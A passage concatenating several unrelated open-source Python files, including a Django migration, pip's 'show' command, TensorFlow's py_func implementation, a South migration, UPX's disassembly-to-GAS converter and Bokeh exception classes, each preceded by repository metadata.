'docs', 'pkg', 'pkg.nspkg', 'pkg.subpkg', 'pkg.subpkg.assets']
self._assert_packages(packages, expected)
def test_regular_package_with_nested_pep420_ns_packages(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_420_packages(
self.dist_dir, exclude=['docs', 'pkg.subpkg.assets'])
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_non_package_dirs(self):
shutil.rmtree(self.docs_dir)
shutil.rmtree(os.path.join(self.dist_dir, 'pkg/subpkg/assets'))
packages = find_420_packages(self.dist_dir)
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
|
aidanlister/django
|
refs/heads/master
|
django/contrib/auth/migrations/0003_alter_user_email_max_length.py
|
586
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0002_alter_permission_name_max_length'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, verbose_name='email address', blank=True),
),
]
|
bzennn/blog_flask
|
refs/heads/master
|
python/lib/python3.5/site-packages/pip/commands/show.py
|
344
|
from __future__ import absolute_import
from email.parser import FeedParser
import logging
import os
from pip.basecommand import Command
from pip.status_codes import SUCCESS, ERROR
from pip._vendor import pkg_resources
from pip._vendor.packaging.utils import canonicalize_name
logger = logging.getLogger(__name__)
class ShowCommand(Command):
"""Show information about one or more installed packages."""
name = 'show'
usage = """
%prog [options] <package> ..."""
summary = 'Show information about installed packages.'
def __init__(self, *args, **kw):
super(ShowCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'-f', '--files',
dest='files',
action='store_true',
default=False,
help='Show the full list of installed files for each package.')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
logger.warning('ERROR: Please provide a package name or names.')
return ERROR
query = args
results = search_packages_info(query)
if not print_results(
results, list_files=options.files, verbose=options.verbose):
return ERROR
return SUCCESS
def search_packages_info(query):
"""
Gather details from installed distributions. Print distribution name,
version, location, and installed files. Installed files requires a
pip generated 'installed-files.txt' in the distributions '.egg-info'
directory.
"""
installed = {}
for p in pkg_resources.working_set:
installed[canonicalize_name(p.project_name)] = p
query_names = [canonicalize_name(name) for name in query]
for dist in [installed[pkg] for pkg in query_names if pkg in installed]:
package = {
'name': dist.project_name,
'version': dist.version,
'location': dist.location,
'requires': [dep.project_name for dep in dist.requires()],
}
file_list = None
metadata = None
if isinstance(dist, pkg_resources.DistInfoDistribution):
# RECORDs should be part of .dist-info metadatas
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
paths = [os.path.join(dist.location, p) for p in paths]
file_list = [os.path.relpath(p, dist.location) for p in paths]
if dist.has_metadata('METADATA'):
metadata = dist.get_metadata('METADATA')
else:
# Otherwise use pip's log for .egg-info's
if dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
paths = [os.path.join(dist.egg_info, p) for p in paths]
file_list = [os.path.relpath(p, dist.location) for p in paths]
if dist.has_metadata('PKG-INFO'):
metadata = dist.get_metadata('PKG-INFO')
if dist.has_metadata('entry_points.txt'):
entry_points = dist.get_metadata_lines('entry_points.txt')
package['entry_points'] = entry_points
if dist.has_metadata('INSTALLER'):
for line in dist.get_metadata_lines('INSTALLER'):
if line.strip():
package['installer'] = line.strip()
break
# @todo: Should pkg_resources.Distribution have a
# `get_pkg_info` method?
feed_parser = FeedParser()
feed_parser.feed(metadata)
pkg_info_dict = feed_parser.close()
for key in ('metadata-version', 'summary',
'home-page', 'author', 'author-email', 'license'):
package[key] = pkg_info_dict.get(key)
# It looks like FeedParser cannot deal with repeated headers
classifiers = []
for line in metadata.splitlines():
if line.startswith('Classifier: '):
classifiers.append(line[len('Classifier: '):])
package['classifiers'] = classifiers
if file_list:
package['files'] = sorted(file_list)
yield package
def print_results(distributions, list_files=False, verbose=False):
"""
Print the informations from installed distributions found.
"""
results_printed = False
for i, dist in enumerate(distributions):
results_printed = True
if i > 0:
logger.info("---")
logger.info("Name: %s", dist.get('name', ''))
logger.info("Version: %s", dist.get('version', ''))
logger.info("Summary: %s", dist.get('summary', ''))
logger.info("Home-page: %s", dist.get('home-page', ''))
logger.info("Author: %s", dist.get('author', ''))
logger.info("Author-email: %s", dist.get('author-email', ''))
logger.info("License: %s", dist.get('license', ''))
logger.info("Location: %s", dist.get('location', ''))
logger.info("Requires: %s", ', '.join(dist.get('requires', [])))
if verbose:
logger.info("Metadata-Version: %s",
dist.get('metadata-version', ''))
logger.info("Installer: %s", dist.get('installer', ''))
logger.info("Classifiers:")
for classifier in dist.get('classifiers', []):
logger.info(" %s", classifier)
logger.info("Entry-points:")
for entry in dist.get('entry_points', []):
logger.info(" %s", entry.strip())
if list_files:
logger.info("Files:")
for line in dist.get('files', []):
logger.info(" %s", line.strip())
if "files" not in dist:
logger.info("Cannot locate installed-files.txt")
return results_printed
|
rebstar6/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/py/testing/root/test_py_imports.py
|
163
|
import py
import types
import sys
def checksubpackage(name):
obj = getattr(py, name)
if hasattr(obj, '__map__'): # isinstance(obj, Module):
keys = dir(obj)
assert len(keys) > 0
print (obj.__map__)
for name in list(obj.__map__):
assert hasattr(obj, name), (obj, name)
def test_dir():
for name in dir(py):
if not name.startswith('_'):
yield checksubpackage, name
def test_virtual_module_identity():
from py import path as path1
from py import path as path2
assert path1 is path2
from py.path import local as local1
from py.path import local as local2
assert local1 is local2
def test_importall():
base = py._pydir
nodirs = [
]
if sys.version_info >= (3,0):
nodirs.append(base.join('_code', '_assertionold.py'))
else:
nodirs.append(base.join('_code', '_assertionnew.py'))
def recurse(p):
return p.check(dotfile=0) and p.basename != "attic"
for p in base.visit('*.py', recurse):
if p.basename == '__init__.py':
continue
relpath = p.new(ext='').relto(base)
if base.sep in relpath: # not py/*.py itself
for x in nodirs:
if p == x or p.relto(x):
break
else:
relpath = relpath.replace(base.sep, '.')
modpath = 'py.%s' % relpath
try:
check_import(modpath)
except py.test.skip.Exception:
pass
def check_import(modpath):
py.builtin.print_("checking import", modpath)
assert __import__(modpath)
def test_all_resolves():
seen = py.builtin.set([py])
lastlength = None
while len(seen) != lastlength:
lastlength = len(seen)
for item in py.builtin.frozenset(seen):
for value in item.__dict__.values():
if isinstance(value, type(py.test)):
seen.add(value)
|
zahari/samba
|
refs/heads/master
|
ctdb/tests/takeover/simulation/nondet_path_01.py
|
31
|
#!/usr/bin/env python
# This is a contrived example that makes the balancing algorithm fail
# for nondeterministic IPs (run with "-dv --nd" to see the failure).
from ctdb_takeover import Cluster, Node, process_args
process_args()
addresses1 = ['A', 'B', 'C', 'D']
addresses2 = ['B', 'E', 'F']
c = Cluster()
for i in range(2):
c.add_node(Node(addresses1))
c.add_node(Node(addresses2))
c.recover()
c.unhealthy(1)
c.recover()
c.healthy(1)
c.recover()
|
ibmsoe/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/script_ops.py
|
32
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Script Language Operators. See the @{python/script_ops} guide.
@@py_func
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_script_ops
class FuncRegistry(object):
"""A helper class to keep track of registered py functions.
FuncRegistry keeps a map from unique tokens (string) to python
functions, which takes numpy arrays and outputs numpy arrays.
"""
def __init__(self):
self._lock = threading.Lock()
self._unique_id = 0 # GUARDED_BY(self._lock)
self._funcs = {}
def insert(self, func):
"""Registers `func` and returns a unique token for this entry."""
token = self._next_unique_token()
self._funcs[token] = func
return token
def remove(self, token):
"""Removes the registered function corresponding to `token`."""
self._funcs.pop(token, None)
@staticmethod
def _convert(value):
"""Converts an arg to numpy, avoiding dangerous string and unicode dtypes.
Numpy pads with zeros when using string and unicode dtypes if different
components of a tensor have different lengths. This is bad: ignoring the
padding is wrong for text data, and removing the padding is wrong for binary
data. To avoid this bug, we redo the conversion using an object dtype.
Args:
value: Value to convert to a numpy array.
Returns:
A numpy array.
"""
result = np.asarray(value, order="C")
if result.dtype.char in "SU" and result is not value:
return np.asarray(value, order="C", dtype=object)
return result
def __call__(self, token, args):
"""Calls the registered function for `token` with args."""
func = self._funcs[token]
if func is None:
raise ValueError("callback %s is not found" % token)
ret = func(*args)
# Ensures that we return either a single numpy array or a list of numpy
# arrays.
if isinstance(ret, (tuple, list)):
return [self._convert(x) for x in ret]
else:
return self._convert(ret)
def size(self):
"""Returns how many functions are currently registered."""
return len(self._funcs)
def _next_unique_token(self):
"""Returns a unique token."""
with self._lock:
uid = self._unique_id
self._unique_id += 1
return "pyfunc_%d" % uid
# Global registry for py functions.
_py_funcs = FuncRegistry()
pywrap_tensorflow.InitializePyTrampoline(_py_funcs)
class CleanupFunc(object):
"""A helper class to remove a registered function from _py_funcs."""
def __init__(self, token):
self._token = token
def __del__(self):
_py_funcs.remove(self._token)
def py_func(func, inp, Tout, stateful=True, name=None):
"""Wraps a python function and uses it as a TensorFlow op.
Given a python function `func`, which takes numpy arrays as its
inputs and returns numpy arrays as its outputs, wrap this function as an
operation in a TensorFlow graph. The following snippet constructs a simple
TensorFlow graph that invokes the `np.sinh()` NumPy function as a operation
in the graph:
```python
def my_func(x):
# x will be a numpy array with the contents of the placeholder below
return np.sinh(x)
inp = tf.placeholder(tf.float32)
y = tf.py_func(my_func, [inp], tf.float32)
```
**N.B.** The `tf.py_func()` operation has the following known limitations:
* The body of the function (i.e. `func`) will not be serialized in a
`GraphDef`. Therefore, you should not use this function if you need to
serialize your model and restore it in a different environment.
* The operation must run in the same address space as the Python program
that calls `tf.py_func()`. If you are using distributed TensorFlow, you
must run a `tf.train.Server` in the same process as the program that calls
`tf.py_func()` and you must pin the created operation to a device in that
server (e.g. using `with tf.device():`).
Args:
func: A Python function, which accepts a list of NumPy `ndarray` objects
having element types that match the corresponding `tf.Tensor` objects
in `inp`, and returns a list of `ndarray` objects (or a single `ndarray`)
having element types that match the corresponding values in `Tout`.
inp: A list of `Tensor` objects.
Tout: A list or tuple of tensorflow data types or a single tensorflow data
type if there is only one, indicating what `func` returns.
stateful: (Boolean.) If True, the function should be considered stateful.
If a function is stateless, when given the same input it will return the
same output and have no observable side effects. Optimizations such as
common subexpression elimination are only performed on stateless
operations.
name: A name for the operation (optional).
Returns:
A list of `Tensor` or a single `Tensor` which `func` computes.
"""
token = _py_funcs.insert(func)
# We tie the registered function's life-time with the current
# default graph. I.e., when the current graph is destroyed, we
# should remove its py funcs.
g = ops.get_default_graph()
# pylint: disable=protected-access
while isinstance(g, function._FuncGraph):
# If the py_func was declared inside a _FuncGraph, its lifetime should be
# bound to that of the outer graph instead.
g = g._outer_graph
cleanup = CleanupFunc(token)
# TODO(zhifengc): Consider adding a Graph method to collect
# `cleanup` objects in one of its member.
if not hasattr(g, "_cleanup_py_funcs_used_in_graph"):
g._cleanup_py_funcs_used_in_graph = []
# When g is destroyed, elements in _cleanup_py_funcs_used_in_graph
# will be destroyed and their __del__ will remove the 'token' from
# the funcs registry.
g._cleanup_py_funcs_used_in_graph.append(cleanup)
# pylint: enable=protected-access
if isinstance(Tout, (list, tuple)):
is_list_or_tuple = True
else:
Tout = [Tout]
is_list_or_tuple = False
# pylint: disable=protected-access
if stateful:
result = gen_script_ops._py_func(
input=inp, token=token, Tout=Tout, name=name)
else:
result = gen_script_ops._py_func_stateless(
input=inp, token=token, Tout=Tout, name=name)
# pylint: enable=protected-access
return result if is_list_or_tuple else result[0]
ops.NotDifferentiable("PyFunc")
ops.NotDifferentiable("PyFuncStateless")
|
willingc/oh-mainline
|
refs/heads/master
|
mysite/profile/migrations/0059_delete_blank_tags.py
|
17
|
# This file is part of OpenHatch.
# Copyright (C) 2009 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.profile.models import *
class Migration:
no_dry_run = True
def forwards(self, orm):
# Changing field 'DataImportAttempt.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 32, 968240)))
db.alter_column('profile_dataimportattempt', 'date_created', orm['profile.dataimportattempt:date_created'])
# Changing field 'PortfolioEntry.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 33, 603219)))
db.alter_column('profile_portfolioentry', 'date_created', orm['profile.portfolioentry:date_created'])
# Changing field 'Citation.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 51, 33, 672464)))
db.alter_column('profile_citation', 'date_created', orm['profile.citation:date_created'])
for tag in orm['profile.tag'].objects.filter(text=''):
tag.delete()
def backwards(self, orm):
# Changing field 'DataImportAttempt.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 13, 868366)))
db.alter_column('profile_dataimportattempt', 'date_created', orm['profile.dataimportattempt:date_created'])
# Changing field 'PortfolioEntry.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 13, 518378)))
db.alter_column('profile_portfolioentry', 'date_created', orm['profile.portfolioentry:date_created'])
# Changing field 'Citation.date_created'
# (to signature: django.db.models.fields.DateTimeField(default=datetime.datetime(2009, 11, 5, 16, 25, 14, 117042)))
db.alter_column('profile_citation', 'date_created', orm['profile.citation:date_created'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.citation': {
'contributor_role': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 256027)'}),
'distinct_months': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'first_commit_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_due_to_duplicate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'languages': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'old_summary': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'portfolio_entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.PortfolioEntry']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.dataimportattempt': {
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 74559)'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.link_person_tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_project_tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_projectexp_tag': {
'Meta': {'unique_together': "[('tag', 'project_exp', 'source')]"},
'favorite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project_exp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.ProjectExp']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person', 'project')]"},
'date_collected': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"})
},
'profile.person': {
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']"}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interested_in_working_on': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.portfolioentry': {
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 11, 5, 16, 51, 34, 616868)'}),
'experience_description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'project_description': ('django.db.models.fields.TextField', [], {})
},
'profile.projectexp': {
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'man_months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'modified': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']", 'null': 'True'}),
'person_role': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'primary_language': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'should_show_this': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)"},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'profile.sourceforgeperson': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.sourceforgeproject': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'profile.tagtype': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'prefix': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'search.project': {
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
}
}
complete_apps = ['profile']
|
null--/graviton
|
refs/heads/master
|
code/external/upx/src/stub/src/arch/i086/wdis2gas.py
|
1
|
#! /usr/bin/env python
## vim:set ts=4 sw=4 et: -*- coding: utf-8 -*-
#
# wdis2gas.py --
#
# This file is part of the UPX executable compressor.
#
# Copyright (C) 1996-2013 Markus Franz Xaver Johannes Oberhumer
# All Rights Reserved.
#
# UPX and the UCL library are free software; you can redistribute them
# and/or modify them under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING.
# If not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Markus F.X.J. Oberhumer Laszlo Molnar
# <markus@oberhumer.com> <ml1050@users.sourceforge.net>
#
import getopt, os, re, string, sys
class opts:
arch = "i086"
label_prefix = ".L"
verbose = 0
# /***********************************************************************
# // main
# ************************************************************************/
def main(argv):
shortopts, longopts = "qv", [
"arch", "label-prefix=", "quiet", "verbose"
]
xopts, args = getopt.gnu_getopt(argv[1:], shortopts, longopts)
for opt, optarg in xopts:
if 0: pass
elif opt in ["-q", "--quiet"]: opts.verbose = opts.verbose - 1
elif opt in ["-v", "--verbose"]: opts.verbose = opts.verbose + 1
elif opt in ["--arch"]: opts.arch = optarg
elif opt in ["--label-prefix"]: opts.label_prefix = optarg
else: assert 0, ("getopt problem:", opt, optarg, xopts, args)
#
assert len(args) == 2
ifile = args[0]
ofile = args[1]
# read ifile
lines = open(ifile, "rb").readlines()
lines = map(string.rstrip, lines)
#
section = None
func = None
olines = []
for i in range(len(lines)):
l = lines[i]
if not l: continue
m = re.search(r"^No disassembly errors", l)
if m: continue
m = re.search(r"^Module:", l)
if m: continue
m = re.search(r"^GROUP:", l)
if m: continue
m = re.search(r"^(BSS|Routine) Size:", l)
if m: continue
m = re.search(r"^Segment:\s+(.+)\s+([0-9a-fA-F]+)\s+bytes$", l)
if m:
s = re.split(r"\s+", m.group(1))
assert len(s) == 3, (i, l, s, m.groups())
section = s
func = None
continue
m = re.search(r"^Comdat:\s+(.+)\s+SEGMENT NONE '(\w+)'\s+([0-9a-fA-F]+)\s+bytes$", l)
if m:
section = [m.group(2)]
assert section[0].endswith("_TEXT"), (i, l, section)
func = re.sub(r"^[_@]+|[_@]+$", "", m.group(1))
olines.append(".section .text." + func)
continue
assert section, (i, l)
m = re.search(r"^0000\s+(\w+):$", l)
if m:
assert section[0].endswith("_TEXT"), (i, l, section)
func = re.sub(r"^[_@]+|[_@]+$", "", m.group(1))
olines.append(".section .text." + func)
continue
assert func, (i, l, section)
m = re.search(r"^[0-9a-fA-F]{4}\s+L\$(\d+):$", l)
if m:
olines.append(opts.label_prefix + m.group(1) + ":")
continue
m = re.search(r"^[0-9a-fA-F]{4} (([0-9a-fA-F]{2} )+)\s+(.+)$", l)
assert m, (i, l)
if m.group(3).startswith("call"):
s = re.split(r"\s+", m.group(3))
assert len(s) == 2, (i, l, s, m.groups())
f = re.sub(r"^[@]+|[@]+$", "", s[1])
olines.append(" call " + f)
elif 1:
s = m.group(3).strip()
s = re.sub(r"L\$(\d+)", opts.label_prefix + r"\g<1>", s)
olines.append(" " + s)
else:
s = re.split(r"\s+", m.group(1).strip())
assert 1 <= len(s) <= 5, (i, l, s, m.groups())
s = ["0x" + x for x in s]
olines.append(" .byte " + ",".join(s))
# write ofile
ofp = open(ofile, "wb")
ofp.write(".code16\n")
ofp.write(".intel_syntax noprefix\n")
if opts.arch in ["i086", "8086", "i8086"]:
ofp.write(".arch i8086, jumps\n")
elif opts.arch in ["i286"]:
ofp.write(".arch i286, jumps\n")
else:
assert 0, ("invalid arch", opts.arch)
if 0:
for sym in ["__AHSHIFT", "__AHINCR", "__LMUL", "__aNahdiff"]:
ofp.write(".extern %s\n" % (sym))
ofp.write(".type %s,@function\n" % (sym))
ofp.write(".size %s,2\n" % (sym))
for l in olines:
ofp.write(l.rstrip() + "\n")
ofp.close()
##print olines
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
quasiben/bokeh
|
refs/heads/master
|
bokeh/server/exceptions.py
|
17
|
''' Provide named exceptions having to do with Bokeh Server operation.
'''
from __future__ import absolute_import
class MessageError(Exception):
''' Indicate an error in constructing a Bokeh Message object.
'''
pass
class ProtocolError(Exception):
''' Indicate an error in processing wire protocol fragments.
'''
pass
class ValidationError(Exception):
''' Indicate an error validating wire protocol fragments.
'''
pass
|
LethusTI/supportcenter
|
refs/heads/master
|
